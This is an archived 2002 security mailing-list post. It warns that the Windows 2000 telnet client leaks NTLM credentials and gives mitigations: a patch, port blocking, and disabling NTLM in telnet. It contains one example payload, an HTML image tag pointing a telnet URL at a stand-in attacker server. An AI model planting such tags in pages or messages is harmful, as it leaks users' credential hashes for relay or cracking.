Firewall Wizards mailing list archives

Re: Danger of telnet on w2k (Was: re: Annoying pop-ups)

From: Mikael Olsson <mikael.olsson () clavister com>
Date: Wed, 30 Oct 2002 16:42:10 +0100



Mikael Olsson wrote:


PLUS port 23 (Telnet!)
     Sure, it isn't on by default, but people found ways to abuse DCOM to
     turn it on remotely. Uh oh.


I just figured that this deserved a bit of extra mention. I'm sure that
most people think "Bah. I've got a good admin password, and I don't log
on via telnet anyway, so I'm safe".

If so, here's something you need to know: Microsoft embedded NTLM auth 
in telnet in w2k.  This means that, unless instructed to do otherwise,
the w2k telnet client will send out NTLM authentication data of the 
currently logged on user whenever you telnet to an NTLM-enabled server.

This same data sent out can be relayed back to your box and used 
to log on to you without delay.  It can also be fed to l0phtcrack.


Microsoft did indeed send out an advisory about this two years ago,
but I figured it deserved another mention, seeing as how people still
tend to forget about this.  All it needs is an image tag like
<img src="telnet://evilserver.int:2323">


Stuff that can help:

- Read http://www.microsoft.com/technet/security/bulletin/MS00-067.asp
  and install patch. The patch is to display a warning before NTLM
  is sent to stuff outside the local zone. However, we have seen the zone 
  schemes be subverted before, so don't rely on it.

- Block port 23 inbound to avoid the direct relay back to your telnet 
  port. Disabling the telnet service might be a good idea, but don't 
  rely on it.

- Run "telnet" without arguments. Type "unset ntlm".
  This prevents the telnet client from sending ntlm hashes at all.

- Blocking port 23 outbound will NOT help.

-- 
Mikael Olsson, Clavister AB
Storgatan 12, Box 393, SE-891 28 ÖRNSKÖLDSVIK, Sweden
Phone: +46 (0)660 29 92 00   Mobile: +46 (0)70 26 222 05
Fax: +46 (0)660 122 50       WWW: http://www.clavister.com

Learn to count in Swedish! "ett, två, tre, fyra, fem, sex, sju ..."
_______________________________________________
firewall-wizards mailing list
firewall-wizards () honor icsalabs com
http://honor.icsalabs.com/mailman/listinfo/firewall-wizards

Current thread:

Re: Annoying pop-ups, (continued)
- Re: Annoying pop-ups Josh Welch (Oct 29)
- Re: Annoying pop-ups Gary Flynn (Oct 29)
- Re: Annoying pop-ups Crispin Cowan (Oct 29)
  - Re: Annoying pop-ups Mikael Olsson (Oct 29)
    - Re: Annoying pop-ups Gregory Austin (Oct 29)
- RE: Annoying pop-ups Ames, Neil (Oct 28)
  - Re: Annoying pop-ups Mikael Olsson (Oct 28)
    - Re: Annoying pop-ups Paul D. Robertson (Oct 29)
    - Re: Annoying pop-ups Luca Berra (Oct 30)
    - Re: Windows networking specifics (Was: re: Annoying pop-ups) Mikael Olsson (Oct 30)
    - Re: Danger of telnet on w2k (Was: re: Annoying pop-ups) Mikael Olsson (Oct 30)
- RE: Annoying pop-ups Ames, Neil (Oct 29)